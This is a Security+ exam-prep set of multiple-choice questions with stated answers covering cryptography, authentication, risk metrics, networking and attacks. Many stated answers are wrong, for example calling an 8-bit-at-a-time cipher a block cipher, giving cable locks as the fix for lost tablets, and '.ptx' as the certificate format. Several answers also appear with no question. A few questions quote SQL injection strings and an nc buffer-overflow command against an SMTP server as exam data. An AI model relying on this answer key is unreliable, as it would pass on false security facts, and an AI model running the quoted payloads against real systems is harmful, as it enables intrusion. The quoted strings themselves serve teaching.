Question & answers study Sec +
A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is five and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection? A. $500 B. $1000 C. $2000 D. $2500
A. $500
Which of the following attacks can be used to exploit a vulnerability created by untrained users? A. A spear phishing email with file attachment B. A DoS using loT devices C. An evil twin wireless access point D. A domain hijacking of a bank website
A. A spear phishing email with file attachment
A user needs to transmit confidential information to a third party. Which of the following should be used to encrypt the message? A. AES B. SHA-2 C. SSL D. RSA
A. AES
Which of the following can be implemented with multiple bit strength? A. AES B. DES C. SHA-1 D. MD5 E. MD4
A. AES
Which of the following encryption algorithms is used primarily to secure data at rest? A. AES B. SSL C. TLS D. RSA
A. AES
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? A. Accounting B. Authorization C. Authentication D. Identification
A. Accounting
A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue: "SELECT " FROM" and '1' = '1' Which of the following can the security administrator determine from this? A. An SQL injection attack is being attempted. B. Legitimate connections are being dropped. C. A network scan is being done on the system. D. An XSS attack is being attempted.
A. An SQL injection attack is being attempted.
Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (Select TWO) A. An attacker could potentially perform a downgrade attack. B. The connection is vulnerable to resource exhaustion. C. The integrity of the data could be at risk. D. The VPN concentrator could revert to L2TP. E. The IPSec payload reverted to 16-bit sequence numbers.
A. An attacker could potentially perform a downgrade attack. E. The IPSec payload reverted to 16-bit sequence numbers.
A security administrator has completed a monthly review of DNS server query logs. The administrator notices continous name resolution attempts from a large number of internal hosts to a single Internet addressable domain name. The security administrator then correlated those logs with the establishment of persistent TCP connections out to this domain. The connections seem to be carrying on the order of kilobytes of data per week. Which of the following is the MOST likely explanation for this anomaly? A. An attacker is exfiltrating large amounts of proprietary company data. B. Employees are playing multiplayer computer games. C. A worm is attempting to spread to other hosts via SMB exploits. D. Internal hosts have become members of a botnet.
A. An attacker is exfiltrating large amounts of proprietary company data.
A technician wants to implement a dual factor authentication system that will enable the organization to authorize access to sensitive systems on a need-to-know basis. Which of the following should be implemented during the authorization stage? A. Biometrics B. Mandatory access control C. Single sign-on D. Role-based access control
A. Biometrics
A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies this type of penetration testing? A. Black Box B. Gray Box C. White Box D. Blue Teaming
A. Black Box
A network stream needs to be encrypted. Sara, the network administrator, has selected a cipher which will encrypt 8 bits at a time before sending the data across the network. Which of the following has Sara selected? A. Block cipher B. Stream cipher C. CRC D. Hashing algorithm
A. Block cipher
An administrator needs to renew a certificate for a web server. Which of the following should be submitted to a CA? A. CSR B. Recovery agent C. Private key D. CRL
A. CSR
A retail store recently deployed tablets for sales employees to use while assisting customers. Two of the tablets have already been lost or stolen. Which of the following would be the BEST way for the store to secure the tablets against future loss or theft? A. Cable locks B. Screen filters C. Geocaching D. Remote wipe
A. Cable locks
A user loses a COPE device. Which of the following should the user do NEXT to protect the data on the device? A. Call the company help desk to remotely wipe the device. B. Report the loss to authorities. C. Check with corporate physical security for the device. D. Identify files that are potentially missing on the device.
A. Call the company help desk to remotely wipe the device.
A security administrator wishes to increase the security of the wireless network. Which of the following BEST addresses this concern? A. Change the encryption from TKIP-based to CCMP-based. B. Set all nearby access points to operate on the same channel. C. Configure the access point to use WEP instead of WPA2. D. Enable all access points to broadcast their SSIDs.
A. Change the encryption from TKIP-based to CCMP-based.
Certificates are used for: (Select TWO). A. Client authentication. B. WEP encryption. C. Access control lists. D. Code signing. E. Password hashing.
A. Client authentication. D. Code signing.
An administrator wants to ensure that the reclaimed space of a hard drive has been sanitized while the computer is in use. Which of the following can be implemented? A. Cluster tip wiping B. Individual file encryption C. Full disk encryption D. Storage retention
A. Cluster tip wiping
A network technician must update the company's wireless configuration settings to comply with new requirements, which means the use of AES encryption. Which of the following settings would BEST ensure the requirements are met? A. Configure CCMP. B. Require TKIP. C. Implement WPA. D. Implement 802.1x
A. Configure CCMP.
Which of the following is an example of multifactor authentication? A. Credit card and PIN B. Username and password C. Password and PIN D. Fingerprint and retina scan
A. Credit card and PIN
Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Corrective D. Deterrent
A. Detective
During a penetration test, some servers in the network were found to be using Telnet as a remote connection protocol. Which of the following would mitigate the identified risk? A. Disable Telnet and deploy SSH. B. Disable Telnet and deploy SFTP. C. Disable Telnet and deploy SNMPv3. D. Disable Telnet and deploy S/MIME.
A. Disable Telnet and deploy SSH.
The security team would like to gather intelligence about the types of attacks being launched against the organization. Which of the following would provide them with the MOST information? A. Implement a honeynet B. Perform a penetration test C. Examine firewall logs D. Deploy an IDS
A. Implement a honeynet
When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal? A. Infrastructure B. Platform C. Software D. Virtualization
A. Infrastructure
An email client says a digital signature is invalid and the sender cannot be verified. The recipient is concerned with which of the following concepts? A. Integrity B. Availability C. Confidentiality D. Remediation
A. Integrity
Use of a smart card to authenticate remote servers remains MOST susceptible to which of the following attacks? A. Malicious code on the local system B. Shoulder surfing C. Brute force certificate cracking D. Distributed dictionary attacks
A. Malicious code on the local system
A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use? A. Non-Intrusive B. Intrusive C. Credentialed D. Passive
A. Non-Intrusive
The human resources department is outsourcing much of its operations to a third party. As part of the process, the local human resources data needs to be transmitted to the third party over the Internet. Which of the following is the BEST way to transmit the data? A. SFTP B. DNSSEC C. SNMPv3 D. LDAPS
A. SFTP
A customer calls a technician and needs to remotely connect to a web server to change some code manually. The technician needs to configure the user's machine with protocols to connect to the Unix web server, which is behind a firewall. Which of the following protocols does the technician MOST likely need to configure? A. SSH B. SFTP C. HTTPS D. SNMP
A. SSH
Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application? A. Sandboxing B. Encryption C. Code signing D. Fuzzing
A. Sandboxing
A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? A. The camera system is infected with a bot. B. The camera system is infected with a RAT. C. The camera system is infected with a Trojan. D. The camera system is infected with a backdoor.
A. The camera system is infected with a bot.
Which of the following is BEST at blocking attacks and providing security at layer 7 of the OSI model? A. WAF B. NIDS C. Routers D. Switches
A. WAF
Which form of attack uses special programs that attempt all possible character combinations to determine passwords? A. brute-force attack B. dictionary attack C. password guessing D. birthday attack
A. brute-force attack
A security administrator has configured FTP in passive mode. Which of the following ports should the security administrator allow on the firewall by default? A. 20 B. 21 C. 22 D. 23
B. 21
After a significant amount of hiring, an organization would like to simplify the connection process to its wireless network for employees while ensuring maximum security. The Chief Information Officer (CIO) wants to get rid of any shared network passwords and require employees to use their company credentials when connecting. Which of the following should be implemented to BEST meet this requirement? A. PSK B. 802.1X C. CCMP D. TKIP
B. 802.1X
Which of the following metrics are used to calculate the SLE? (Select TWO) A. ROI B. ARO C. ALE D. MTBF E. MTTF F. TCO
B. ARO C. ALE
A company's new policy allows employees to connect to corporate email using BYOD. Since employees handle client information in their corporate email, which of the following should the company implement with BYOD? (Choose TWO) A. Enable rooting of the devices. B. Assign passwords and PINs to the devices. C. Disable remote wipe. D. Enable full-device encryption. E. Disable the devices' ability to connect to open networks. F. Allow third-party app stores.
B. Assign passwords and PINs to the devices. D. Enable full-device encryption.
Which of the following access management concepts is MOST closely associated with the use of a password or PIN? A. Authorization B. Authentication C. Accounting D. Identification
B. Authentication
Data execution prevention is a feature in most operating systems intended to protect against which type of attack? A. Cross-site scripting B. Buffer overflow C. Header manipulation D. SQL injection
B. Buffer overflow
Which of the following security controls provides an alternative solution to a control that would be considered unpractical or excessively expensive? A. Deterrent B. Compensating C. Technical D. Administrative
B. Compensating
Which of the following is the MOST secure protocol to transfer files? A. FTP B. FTPS C. SSH D. TELNET
B. FTPS
Ann, the security administrator, wishes to implement multifactor security. Which of the following should be implemented in order to compliment password usage and smart cards? A. Hard tokens B. Fingerprint readers C. Swipe badge readers D. Passphrases
B. Fingerprint readers
Which of the following types of attacks involves interception of authentication traffic in an attempt to gain unauthorized access to a wireless network? A. Near field communication B. IV attack C. Evil twin D. Replay attack
B. IV attack
An organization's IT department announced plans to upgrade workstation operating systems to the lastest version after electing to skip the prior two versions. Which of the following vulnerabilities is the organization seeking to mitigate? A. Incompatibility issues with currently implemented software. B. Lack of vendor support on the version currently in use. C. Poorly defined security baselines. D. Use of expired certificates on the network.
B. Lack of vendor support on the version currently in use.
Which of the following network design elements allows for many internal devices to share one public IP address? A. DNAT B. PAT C. DNS D. DMZ
B. PAT
Which of the following are used to increase the computing time it takes to brute force a password using offline attack? (Select TWO) A. XOR B. PBKDF2 C. bcrypt D. HMAC E. RIPEMD
B. PBKDF2 C. bcrypt
Maintenance workers find an active network switch hidden above a dropped-ceiling tile in the CEO's office with various connected cables from the office. Which of the following describes the type of attack that was occurring? A. Spear phishing B. Packet sniffing C. Impersonation D. MAC flooding
B. Packet sniffing
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed? A. Aggressive scan B. Passive scan C. Non-credentialed scan D. Compliance scan
B. Passive scan
All of the following are valid cryptographic hash functions EXCEPT: A. RIPEMD. B. RC4. C. SHA-512. D. MD4.
B. RC4.
Which of the following types of embedded systems is required in manufacturing environments with life safety requirements? A. MFD B. RTOS C. SoC D. RTU
B. RTOS
Pete, an employee, is terminated from the company and the legal department needs documents from his encrypted hard drive. Which of the following should be used to accomplish this task? (Select TWO). A. Private hash B. Recovery agent C. Public key D. Key escrow E. CRL
B. Recovery agent D. Key escrow
Identifying residual risk is MOST important to which of the following concepts? A. Risk deterrence B. Risk acceptance C. Risk mitigation D. Risk avoidance
B. Risk acceptance
A network administrator is asked to send a large file containing PII to a business associate. Which of the following protocols is the BEST choice to use? A. SSH B. SFTP C. SMTP D. FTP
B. SFTP
In order for Sara, a client, to logon to her desktop computer, she must provide her username, password, and a four digit PIN. Which of the following authentication methods is Sara using? A. Three factor B. Single factor C. Two factor D. Four factor
B. Single factor
An organization wants to ensure servers and applications can be deployed rapidly, in a consistent manner, and allow for flexible configuration changes. Which of the following should the organization use to make this process repeatable across multiple locations? A. Redundancy B. Templates C. Snapshots D. Elasticity E. Configuration validation
B. Templates
The concept of rendering data passing between two points over an IP based network impervious to all but the most sophisticated advanced persistent threats is BEST categorized as which of the following? A. Stream ciphers B. Transport encryption C. Key escrow D. Block ciphers
B. Transport encryption
Which of the following components of an all-in-one security appliance would MOST likely be configured in order to restrict access to peer-to-peer file sharing websites? A. Spam filter B. URL filter C. Content inspection D. Malware inspection
B. URL filter
A systems administrator wants to provide a balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network? A. Open wireless network and SSL VPN B. WPA using a preshared key C. WAP2 using a RADIUS back-end for 802.1x authentication D. WEP with a 40-bit key
B. WPA using a preshared key
Which of the following are considered among the BEST indicators that a received message is a hoax? (Select TWO) A. Minimal use of uppercase in the message B. Warnings of monetary loss to the receiver C. No valid digital signature from a known security security organization D. Claims of possible damage to computer hardware E. Embedded URLs
B. Warnings of monetary loss to the receiver D. Claims of possible damage to computer hardware
Which of the following is a BEST practice when dealing with user accounts that will only need to be active for a limited time period? A. When creating the account, set the account to not remember password history. B. When creating the account, set an expiration date on the account. C. When creating the account, set a password expiration date on the account. D. When creating the account, set the account to have time of day restrictions.
B. When creating the account, set an expiration date on the account.
A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process? A. Restore lost data from a backup. B. Wipe the system. C. Document the lessons learned. D. Determine the scope of impact
B. Wipe the system.
Which of the following is a management control? A. Logon banners B. Written security policy C. SYN attack prevention D. Access Control List (ACL)
B. Written security policy
Which of the following IP addresses would be hosts on the same subnet given the subnet mask 255.255.255.224? (Select TWO). A. 10.4.4.125 B. 10.4.4.158 C. 10.4.4.165 D. 10.4.4.189 E. 10.4.4.199
C. 10.4.4.165 D. 10.4.4.189
Which of the following would BEST deter an attacker trying to brute force 4-digit PIN numbers to access an account at a bank teller machine? A. Account expiration settings B. Complexity of PIN C. Account lockout settings D. PIN history requirements
C. Account lockout settings
Which of the following development models entails several iterative and incremental software development methodologies such as SCRUM? A. Spiral B. Waterfall C. Agile D. Rapid
C. Agile
Which of the following encryption methods does PKI typically use to securely protect keys? A. Elliptic curve B. Digital signatures C. Asymmetric D. Obfuscation
C. Asymmetric
In Kerberos, the Ticket Granting Ticket (TGT) is used for which of the following? A. Identification B. Authorization C. Authentication D. Multifactor authentication
C. Authentication
For this common security issue, the first item to check as you begin the troubleshooting process is that the correct username and password have been entered. A. Baseline deviation B. Unauthorized software C. Authentication errors D. Clear-text credentials
C. Authentication errors
Which of the following access management concepts is associated with file permissions? A. Authentication B. Accounting C. Authorization D. Identification
C. Authorization
Which of the following is an asymmetric function that generates a new and separate key every time it runs? A. RSA B. DSA C. DHE D. HMAC E. PBKDF2
C. DHE
To help prevent against an SQL injection, which of the following functions should the application developer implement? A. Error handling B. Code signing C. Input validation D. Model verification
C. Input validation
A security specialist must confirm file backups match the original copy. Which of the following should the security specialist use to accomplish the objective? A. AES B. 3ES C. MD5 D. RSA
C. MD5
Which of the following is used to validate the integrity of data? A. CBC B. Blowfish C. MD5 D. RSA
C. MD5
Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal? A. PIN B. Security question C. Smart card D. Passphrase E. CAPTCHA
C. Smart card
Which of the following has a storage root key? A. HSM B. EFS C. TPM D. TKIP
C. TPM
Users are able to reach the login page of their company website from home using HTTP. A network administrator disables HTTP and implements SSL. However, after the implementation, home users cannot access the login page of the company website. Which of the following is the MOST likely reason the site is unavailable? A. The user's browsers are not equipped for SSL. B. The company website implements HTTP redirects. C. The company firewall is blocking port 443 traffic. D. The company web server is using an expired certificate.
C. The company firewall is blocking port 443 traffic.
A DFIR analyst is collecting log data from multiple global locations. Which of the following must the DFIR analyst do to properly utilize the logs for forensic analysis? A. Log encryption B. Filling out chain of custody C. Time normalization D. Timesheet update
C. Time normalization
Which of the following methods is used by internal security teams to assess the security of internally developed applications? A. Active reconnaissance B. Pivoting C. White box testing D. Persistence
C. White box testing
Which of the following ports is used for SSH, by default? A. 23 B. 32 C. 12 D. 22
D. 22
Which of the following ports and protocol types must be opened on a host with a host-based firewall to allow incoming SFTP connections? A. 21/UDP B. 21/TCP C. 22/UDP D. 22/TCP
D. 22/TCP
Which of the following BEST describes the impact of an unremeditated session timeout vulnerability? A. The credentials of a legitimate user could be intercepted and reused to log in when the legitimate user is offline. B. An attacker has more time to attempt brute-force password cracking. C. More than one user may be allowed to concurrently connect to the system, and an attacker can use one of those concurrent connections. D. An attacker could use an existing session that has been initiated by a legitimate user.
D. An attacker could use an existing session that has been initiated by a legitimate user.
Which of the following locations contain the MOST volatile data? A. SSD B. Paging file C. RAM D. Cache memory
D. Cache memory
Which of the following technologies can store multi-tenant data with different security requirements? A. Data loss prevention B. Trusted platform module C. Hard drive encryption D. Cloud computing
D. Cloud computing
Which of the following computer recovery sites is the least expensive and the most difficult to test at the same time? A. Non-mobile hot site B. Mobile hot site C. Warm site D. Cold site
D. Cold site
D. SQL injection
D. DHCP snooping
Customers' credit card information was stolen from a popular video streaming company. A security consultant determined that the information was stolen, while in transit, from the gaming consoles of a particular vendor. Which of the following methods should the company consider to secure this data in the future? A. Application firewalls B. Manual updates C. Firmware version control D. Encrypted TCP wrappers
D. Encrypted TCP wrappers
In which of the following steps of incident response does a team analyze the incident and determine steps to prevent a future occurrence? A. Mitigation B. Identification C. Preparation D. Lessons learned
D. Lessons learned
A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application? A. Hashing B. Key exchange C. Encryption D. Obfuscation
D. Obfuscation
D. SQL injection
D. Privilege escalation
When creating a public / private key pair, for which of the following ciphers would a user need to specify the key strength? A. SHA B. AES C. DES D. RSA
D. RSA
A security specialist is notified about a certificate warning that users receive when using a new internal website. After being given the URL from one of the users and seeing the warning, the security specialist inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site. Which of the following would BEST resolve the issue? A. OSCP B. OID C. PEM D. SAN
D. SAN
By default, which of the following uses TCP port 22? (Select THREE). A. FTPS B. STELNET C. TLS D. SCP E. SSL F. HTTPS G. SSH H. SFTP
D. SCP G. SSH H. SFTP
Logs from an IDS alerted on a string entered into the company's website login page. The following line was pulled from the HTTP POST request. userid=bob' and 1='1&request=Submit Which of the following was attempted? A. Reflected XSS B. Stored XSS C. Cross-site request forgery D. SQL injection
D. SQL injection
Using proximity card readers instead of the traditional key punch doors would help to mitigate: A. Impersonation B. Tailgating C. Dumpster diving D. Shoulder surfing
D. Shoulder surfing
Which of the following would allow the organization to divide a Class C IP address range into several ranges? A. DMZ B. Virtual LANs C. NAT D. Subnetting
D. Subnetting
A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is the BEST solution for the company to implement? A. Reduced failed logon attempts. B. Mandatory password changes. C. Increased account lockout time. D. Time-of-day restrictions.
D. Time-of-day restrictions.
To get the most accurate results on the security posture of a system, which of the following actions should the security analyst do prior to scanning? A. Log all users out of the system. B. Patch the scanner. C. Reboot the target host. D. Update the plugins.
D. Update the plugins.
A security analyst is implementing PKI-based functionality to a web application that has the following requirements: File contains certificate information Certificate chains Root authority certificates Private key All of these components will be part of one file and cryptographically protected with a password. Given the scenario, which of the following certificate types should the analyst implement to BEST meet these requirements? A. .ptx certificate B. .cer certificate C. .der certificate D. .crt certificate
A. .ptx certificate
A security analyst is hardening a large-scale wireless network. The primary requirements are the following: Must use authentication through EAP-TLS certificates Must use an AAA server Must use the most secure encryption protocol Given these requirements, which of the following should the analyst implement and recommend? (Select TWO). A. 802.1X B. 802.3 C. LDAP D. TKIP E. CCMP F. WPA2-PSK
A. 802.1X E. CCMP
Which of the following controls would allow a company to reduce the exposure of sensitive systems from unmanaged devices on internal networks? A. 802.1x B. Data encryption C. Password strength D. BGP
A. 802.1x
A systems administrator has implemented PKI on a classified government network. In the event that a disconnect occurs from the primary CA, which of the following should be accessible locally from every site to ensure users with bad certificates cannot gain access to the network? A. A CRL B. Make the RA available C. A verification authority D. A redundant CA
A. A CRL
Which of the following is an example of resource exhaustion? A. A penetration tester requests every available IP address from a DHCP server. B. An SQL injection attack returns confidential data back to the customer. C. Server CPU utilization peaks at 100% during the reboot process. D. System requirements for a new software package recommend having 12GB of RAM, but only 8GB are available.
A. A penetration tester requests every available IP address from a DHCP server.
Which of the following differentiates a collision attack from a rainbow table attack? A. A rainbow table attack performs a hash lookup. B. A rainbow table attack uses the hash as a password. C. In a collision attack, the hash and the input data are equivalent. D. In a collision attack, the same input results in different hashes.
A. A rainbow table attack performs a hash lookup.
Sara, a security manager, has decided to force expiration of all company passwords by the close of business day. Which of the following BEST supports this reasoning? A. A recent security breach in which passwords were cracked. B. Implementation of configuration management processes. C. Enforcement of password complexity requirements. D. Implementation of account lockout procedures.
A. A recent security breach in which passwords were cracked.
An organization is deploying a new system to the production environment. A security analyst discovers the system is not properly hardened or patched. Which of the following BEST describes the scenario? A. A secure baseline was not established early in the process. B. User acceptance testing was not completed. C. Integrity checks were not conducted to ensure it was the correct system. D. An application code error was introduced during the development phase.
A. A secure baseline was not established early in the process.
A security consultant is gathering information about the frequency of a security threat's impact to an organization. Which of the following should the consultant use to label the number of times an attack can be expected to impact the organization in a 365-day period? A. ARO B. MTBF C. ALE D. MTTR E. SLA
A. ARO
To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO
A. ARO D. SLE
Which of the following enables sniffing attacks against a switched network? A. ARP poisoning B. IGMP snooping C. IP spoofing D. SYN flooding
A. ARP poisoning
Which of the following differentiates ARP poisoning from a MAC spoofing attack? A. ARP poisoning uses unsolicited ARP replies. B. ARP poisoning overflows a switch's CAM table. C. MAC spoofing uses DHCPOFFER/DHCPACK packets. D. MAC spoofing can be performed across multiple routers.
A. ARP poisoning uses unsolicited ARP replies.
A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites: 10 PERMIT FROM:ANY TO:ANY PORT:80 20 PERMIT FROM: ANY TO:ANY PORT 443 30 DENY FROM:ANY TO:ANY PORT:ANY Which of the following is the MOST secure solution the security administrator can implement to fix this issue? A. Add the following rule to the firewall: 5 PERMIT FROM: ANY TO:ANY PORT:53 B. Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22 C. Insert the following rule in the firewall: 25 PERMIT FROM:ANY TO:ANY PORTS:ANY D. Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY
A. Add the following rule to the firewall: 5 PERMIT FROM: ANY TO:ANY PORT:53
A security administrator is concerned about the increasing number of users who click on malicious links contained within phishing emails. Although the company has implemented a process to block these links at the network perimeter, many accounts are still becoming compromised. Which of the following should be implemented to further reduce the number of account compromises caused by remote users who click these links? A. Anti-spam gateways B. Security awareness training C. URL rewriting D. Internal phishing campaign
A. Anti-spam gateways
Which of the following is an example of a false positive? A. Anti-virus identifies a benign application as malware. B. A biometric iris scanner rejects an authorized user wearing a new contact lens. C. A user account is locked out after the user mistypes the password too many times. D. The IDS does not identify a buffer overflow.
A. Anti-virus identifies a benign application as malware.
A security analyst has been dealing with a large number of malware infections on workstations with legacy operating systems. The infections are not being detected by the current AV suite. Further analysis shows that the signatures are up-to-date and the AV engines are functioning correctly. The company is unable to afford next-generation AV that prevents these types of attacks. Which of the following methods should the security analyst employ to prevent future outbreaks/ A. Application whitelisting B. Patch management C. Host-based intrusion detection D. File integrity monitoring
A. Application whitelisting
A security analyst observes the following events in the logs of an employee workstation: 1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level. 1/23 1:07:09 1034 The scan is completed. No detections were found. The security analyst reviews the file system and observes the following: C:\>dir C:\Users\user\temp 1/23 1:07:02 oasdfkh.hta 1/23 1:07:02 update.bat 1/23 1:07:02 msg.txt Given the information provided, which of the following MOST likely occurred on the workstation? A. Application whitelisting controls blocked an exploit payload from executing. B. Antivirus software found and quarantined three malware files. C. Automatic updates were initiated but failed because they had not been approved. D. The SIEM log aged was not tuned properly and reported a false positive.
A. Application whitelisting controls blocked an exploit payload from executing.
A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network: Hostname IP Address MAC MAC Filter DadPC 192.168.1.15 00:1D:1A:44:17:B5 On MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off JuniorPC 192.168.2.16 42:A7:D1:25:11:52 On Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? A. Apply MAC filtering and see if the router drops any of the systems B. Physically check each of the authorized systems to determine if they are logged onto the network C. Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host D. Conduct a ping sweep of each of the authorized systems and see if an echo response is received
A. Apply MAC filtering and see if the router drops any of the systems
Which of the following describes a type of malware which is difficult to reverse engineer in a virtual lab? A. Armored virus B. Polymorphic malware C. Logic bomb D. Rootkit
A. Armored virus
A company that purchased an HVAC system for the datacenter is MOST concerned with which of the following? A. Availability B. Integrity C. Confidentiality D. Fire suppression
A. Availability
Which of the following are used to substantially increase the computation time required to crack a password? (Select TWO). A. BCRYPT B. Substitution cipher C. ECDHE D. PBKDF2 E. Diffie-Hellman
A. BCRYPT D. PBKDF2
A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? A. Banner grabbing B. Port scanning C. Packet sniffing D. Virus scanning
A. Banner grabbing
A network technician is on the phone with the system administration team. Power to the server room was lost and servers need to be restarted. The DNS services must be the first to be restarted. Several machines are powered off. Assuming each server only provides one service, which of the following should be powered on FIRST to establish DNS services? A. Bind server B. Apache server C. Exchange server D. RADIUS server
A. Bind server
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus
A. Botnet
Sara, an application developer, implemented error and exception handling alongside input validation. Which of the following does this help prevent? A. Buffer overflow B. Pop-up blockers C. Cross-site scripting D. Fuzzing
A. Buffer overflow
Which of the following type of attack is the result of software vulnerabilities and is caused by supplying more data than is expected in an input field? A. Buffer overflow attack B. Cross site scripting C. Denial-of-Service (DoS) attack D. App overloading
A. Buffer overflow attack
During a routine vulnerability assessment, the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' ' " | nc www.company.com 25 Which of the following vulnerabilities is being exploited? A. Buffer overflow directed at a specific host MTA B. SQL injection directed at a web server C. Cross-site scripting directed at www.company.com D. Race condition in a UNIX shell script
A. Buffer overflow directed at a specific host MTA
A network administrator wants to block both DNS requests and zone transfers coming from outside IP addresses. The company uses a firewall which implements an implicit allow and is currently configured with the following ACL applied to its external interfacE. PERMIT TCP ANY ANY 80 PERMIT TCP ANY ANY 443 Which of the following rules would accomplish this task? (Select TWO). A. Change the firewall default settings so that it implements an implicit deny B. Apply the current ACL to all interfaces of the firewall C. Remove the current ACL D. Add the following ACL at the top of the current ACL DENY TCP ANY ANY 53 E. Add the following ACL at the bottom of the current ACL DENY ICMP ANY ANY 53 F. Add the following ACL at the bottom of the current ACL DENY IP ANY ANY 53
A. Change the firewall default settings so that it implements an implicit deny F. Add the following ACL at the bottom of the current ACL DENY IP ANY ANY 53
A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Select TWO) A. Compare configurations against platform benchmarks. B. Confirm adherence to the company's industry-specific regulations C. Review the company's current security baseline. D. Verify alignment with policy related to regulatory compliance. E. Run an exploitation framework to confirm vulnerabilities.
A. Compare configurations against platform benchmarks. C. Review the company's current security baseline.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Competitor B. Hacktivist C. Insider D. Organized crime
A. Competitor
Which of the following encompasses application patch management? A. Configuration management B. Policy management C. Cross-site request forgery D. Fuzzing
A. Configuration management
A security admistrator is creating a risk assessment with regard to how to harden internal communications in transit between servers. Which of the following should the administrator recommend in the report? A. Configure IPSec in transport mode. B. Configure server-based PKI certificates. C. Configure the GRE tunnel. D. Configure a site-to-site tunnel.
A. Configure IPSec in transport mode.
An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software? A. Configure a firewall with deep packet inspection that restricts traffic to the systems. B. Configure a separate zone for the systems and restrict access to known ports. C. Configure the systems to ensure only necessary applications are able to run. D. Configure the host firewall to ensure only the necessary applications have listening ports.
A. Configure a firewall with deep packet inspection that restricts traffic to the systems.
A technician has installed a new AAA server, which will be used by the network team to control access to a company's routers and switches. The technician completes the configuration by adding the network team members to the NETWORK_TEAM group, and then adding the NETWORK_TEAM group to the appropriate ALLOW_ACCESS access list. Only members of the network team should have access to the company's routers and switches. NETWORK_TEAM Lee Andrea Pete ALLOW_ACCESS DOMAIN_USERS AUTHENTICATED_USERS NETWORK_TEAM Members of the network team successfully test their ability to log on to various network devices configured to use the AAA server. Weeks later, an auditor asks to review the following access log sample: 5/26/2017 10:20 PERMIT: LEE 5/27/2017 13:45 PERMIT: ANDREA 5/27/2017 09:12 PERMIT: LEE 5/28/2017 16:37 PERMIT: JOHN 5/29/2017 08:53 PERMIT: LEE A. Configure the ALLOW_ACCESS group logic to use AND rather than OR. B. Move the NETWORK_TEAM group to the top of the ALLOW_ACCESS access list. C. Disable group nesting for ALLOW_ACCESS group in the AAA server. D. Remove the DOMAIN_USERS group from the ALLOW_ACCESS group.
A. Configure the ALLOW_ACCESS group logic to use AND rather than OR.
A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this? A. Configure the OS default TTL to 1 B. Use NAT on the R&D network C. Implement a router ACL D. Enable protected ports on the switch
A. Configure the OS default TTL to 1
While investigating a virus infection, a security analyst discovered the following on an employee laptop: Multiple folders containing a large number of newly released movies and music files Proprietary company data A large amount of PHI data Unapproved FTP software Documents that appear to belong to a competitor Which of the following should the analyst do FIRST? A. Contact the legal and compliance department for guidance. B. Delete the files, remove the FTTP software, and __________ C. Back up the files and return the device to ___________ D. Wipe and reimage the device.
A. Contact the legal and compliance department for guidance.
A recent audit contained significant findings for several servers, including: Missing OS and vendor patches, expired SSL certificate, and out of date antivirus. In the future, which of the following capabilities would enable administrators to detect these issues proactively? A. Credentialed vulnerability scan B. Non-credentialed vulnerability scan C. Automatic file integrity checking D. Manual file integrity checking E. Log collection and correlation
A. Credentialed vulnerability scan
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select THREE). A. Cypto-malware B. Adware C. Botnet attack D. Virus E. Ransomware F. Backdoor G. DDoS attack
A. Cypto-malware C. Botnet attack E. Ransomware
